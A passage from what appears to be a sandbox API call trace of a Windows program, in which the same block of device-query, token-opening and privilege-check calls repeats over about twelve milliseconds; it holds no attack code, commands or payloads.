returned 1 [0016.922] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.922] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.922] GetLastError () returned 0x578 [0016.922] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.922] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.923] GetCurrentThread () returned 0xfffffffe [0016.923] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.923] GetLastError () returned 0x3f0 [0016.923] GetCurrentProcess () returned 0xffffffff [0016.923] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.923] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.923] SetLastError (dwErrCode=0x522) [0016.923] CloseHandle (hObject=0x114) returned 1 [0016.923] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.923] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.923] GetLastError () returned 0x578 [0016.923] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.923] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.923] GetCurrentThread () returned 0xfffffffe [0016.923] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.923] GetLastError () returned 0x3f0 [0016.923] GetCurrentProcess () returned 0xffffffff [0016.923] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.923] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.923] SetLastError (dwErrCode=0x522) [0016.923] CloseHandle (hObject=0x114) returned 1 [0016.923] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.923] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.923] GetLastError () returned 0x578 [0016.923] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.924] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.924] GetCurrentThread () returned 0xfffffffe [0016.924] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.924] GetLastError () returned 0x3f0 [0016.924] GetCurrentProcess () returned 0xffffffff [0016.924] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.924] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.924] SetLastError (dwErrCode=0x522) [0016.924] CloseHandle (hObject=0x114) returned 1 [0016.924] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.924] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.924] GetLastError () returned 0x578 [0016.924] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.924] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.924] GetCurrentThread () returned 0xfffffffe [0016.924] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.924] GetLastError () returned 0x3f0 [0016.924] GetCurrentProcess () returned 0xffffffff [0016.924] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.924] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.924] SetLastError (dwErrCode=0x522) [0016.924] CloseHandle (hObject=0x114) returned 1 [0016.924] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.924] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.924] GetLastError () returned 0x578 [0016.925] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.925] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.925] GetCurrentThread () returned 0xfffffffe [0016.925] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.925] GetLastError () returned 0x3f0 [0016.925] GetCurrentProcess () returned 0xffffffff [0016.925] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.925] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.925] SetLastError (dwErrCode=0x522) [0016.925] CloseHandle (hObject=0x114) returned 1 [0016.925] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.925] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.925] GetLastError () returned 0x578 [0016.925] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.925] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.925] GetCurrentThread () returned 0xfffffffe [0016.925] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.925] GetLastError () returned 0x3f0 [0016.925] GetCurrentProcess () returned 0xffffffff [0016.925] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.925] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.925] SetLastError (dwErrCode=0x522) [0016.925] CloseHandle (hObject=0x114) returned 1 [0016.925] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.925] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.925] GetLastError () returned 0x578 [0016.926] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.926] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.926] GetCurrentThread () returned 0xfffffffe [0016.926] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.926] GetLastError () returned 0x3f0 [0016.926] GetCurrentProcess () returned 0xffffffff [0016.926] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.926] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.926] SetLastError (dwErrCode=0x522) [0016.926] CloseHandle (hObject=0x114) returned 1 [0016.926] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.926] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.926] GetLastError () returned 0x578 [0016.926] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.926] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.926] GetCurrentThread () returned 0xfffffffe [0016.926] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.926] GetLastError () returned 0x3f0 [0016.926] GetCurrentProcess () returned 0xffffffff [0016.926] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.926] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.926] SetLastError (dwErrCode=0x522) [0016.926] CloseHandle (hObject=0x114) returned 1 [0016.926] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.926] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.926] GetLastError () returned 0x578 [0016.927] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.927] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.927] GetCurrentThread () returned 0xfffffffe [0016.927] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.927] GetLastError () returned 0x3f0 [0016.927] GetCurrentProcess () returned 0xffffffff [0016.927] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.927] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.927] SetLastError (dwErrCode=0x522) [0016.927] CloseHandle (hObject=0x114) returned 1 [0016.927] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.927] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.927] GetLastError () returned 0x578 [0016.927] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.927] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.927] GetCurrentThread () returned 0xfffffffe [0016.927] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.927] GetLastError () returned 0x3f0 [0016.927] GetCurrentProcess () returned 0xffffffff [0016.927] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.927] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.927] SetLastError (dwErrCode=0x522) [0016.927] CloseHandle (hObject=0x114) returned 1 [0016.927] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.927] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.928] GetLastError () returned 0x578 [0016.928] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.928] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.928] GetCurrentThread () returned 0xfffffffe [0016.928] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.928] GetLastError () returned 0x3f0 [0016.928] GetCurrentProcess () returned 0xffffffff [0016.928] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.928] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.928] SetLastError (dwErrCode=0x522) [0016.928] CloseHandle (hObject=0x114) returned 1 [0016.928] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.928] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.928] GetLastError () returned 0x578 [0016.928] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.928] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.928] GetCurrentThread () returned 0xfffffffe [0016.928] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.928] GetLastError () returned 0x3f0 [0016.928] GetCurrentProcess () returned 0xffffffff [0016.928] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.928] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.928] SetLastError (dwErrCode=0x522) [0016.928] CloseHandle (hObject=0x114) returned 1 [0016.929] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.929] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.929] GetLastError () returned 0x578 [0016.929] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.929] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.929] GetCurrentThread () returned 0xfffffffe [0016.929] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.929] GetLastError () returned 0x3f0 [0016.929] GetCurrentProcess () returned 0xffffffff [0016.929] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.929] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.929] SetLastError (dwErrCode=0x522) [0016.929] CloseHandle (hObject=0x114) returned 1 [0016.929] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.929] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.929] GetLastError () returned 0x578 [0016.929] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.929] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.929] GetCurrentThread () returned 0xfffffffe [0016.929] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.929] GetLastError () returned 0x3f0 [0016.929] GetCurrentProcess () returned 0xffffffff [0016.929] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.929] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.929] SetLastError (dwErrCode=0x522) [0016.929] CloseHandle (hObject=0x114) returned 1 [0016.930] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.930] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.930] GetLastError () returned 0x578 [0016.930] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.930] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.930] GetCurrentThread () returned 0xfffffffe [0016.930] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.930] GetLastError () returned 0x3f0 [0016.930] GetCurrentProcess () returned 0xffffffff [0016.930] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.930] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.930] SetLastError (dwErrCode=0x522) [0016.930] CloseHandle (hObject=0x114) returned 1 [0016.930] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.930] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.930] GetLastError () returned 0x578 [0016.930] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.930] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.930] GetCurrentThread () returned 0xfffffffe [0016.930] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.930] GetLastError () returned 0x3f0 [0016.930] GetCurrentProcess () returned 0xffffffff [0016.930] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.930] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.930] SetLastError (dwErrCode=0x522) [0016.930] CloseHandle (hObject=0x114) returned 1 [0016.931] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.931] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.931] GetLastError () returned 0x578 [0016.931] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.931] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.931] GetCurrentThread () returned 0xfffffffe [0016.931] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.931] GetLastError () returned 0x3f0 [0016.931] GetCurrentProcess () returned 0xffffffff [0016.931] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.931] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.931] SetLastError (dwErrCode=0x522) [0016.931] CloseHandle (hObject=0x114) returned 1 [0016.931] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.931] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.931] GetLastError () returned 0x578 [0016.931] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.931] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.931] GetCurrentThread () returned 0xfffffffe [0016.931] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.931] GetLastError () returned 0x3f0 [0016.931] GetCurrentProcess () returned 0xffffffff [0016.931] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.931] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.931] SetLastError (dwErrCode=0x522) [0016.931] CloseHandle (hObject=0x114) returned 1 [0016.932] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.932] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.932] GetLastError () returned 0x578 [0016.932] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.932] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.932] GetCurrentThread () returned 0xfffffffe [0016.932] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.932] GetLastError () returned 0x3f0 [0016.932] GetCurrentProcess () returned 0xffffffff [0016.932] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.932] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.932] SetLastError (dwErrCode=0x522) [0016.932] CloseHandle (hObject=0x114) returned 1 [0016.932] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.932] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.932] GetLastError () returned 0x578 [0016.932] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.932] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.932] GetCurrentThread () returned 0xfffffffe [0016.932] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.932] GetLastError () returned 0x3f0 [0016.932] GetCurrentProcess () returned 0xffffffff [0016.932] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.932] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.932] SetLastError (dwErrCode=0x522) [0016.933] CloseHandle (hObject=0x114) returned 1 [0016.933] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.933] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.933] GetLastError () returned 0x578 [0016.933] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.933] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.933] GetCurrentThread () returned 0xfffffffe [0016.933] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.933] GetLastError () returned 0x3f0 [0016.933] GetCurrentProcess () returned 0xffffffff [0016.933] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.933] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.933] SetLastError (dwErrCode=0x522) [0016.933] CloseHandle (hObject=0x114) returned 1 [0016.933] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0016.933] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0016.933] GetLastError () returned 0x578 [0016.933] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0016.933] GetPriorityClass (hProcess=0x0) returned 0x0 [0016.933] GetCurrentThread () returned 0xfffffffe [0016.933] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0016.933] GetLastError () returned 0x3f0 [0016.933] GetCurrentProcess () returned 0xffffffff [0016.933] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0016.933] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0016.934] SetLastError 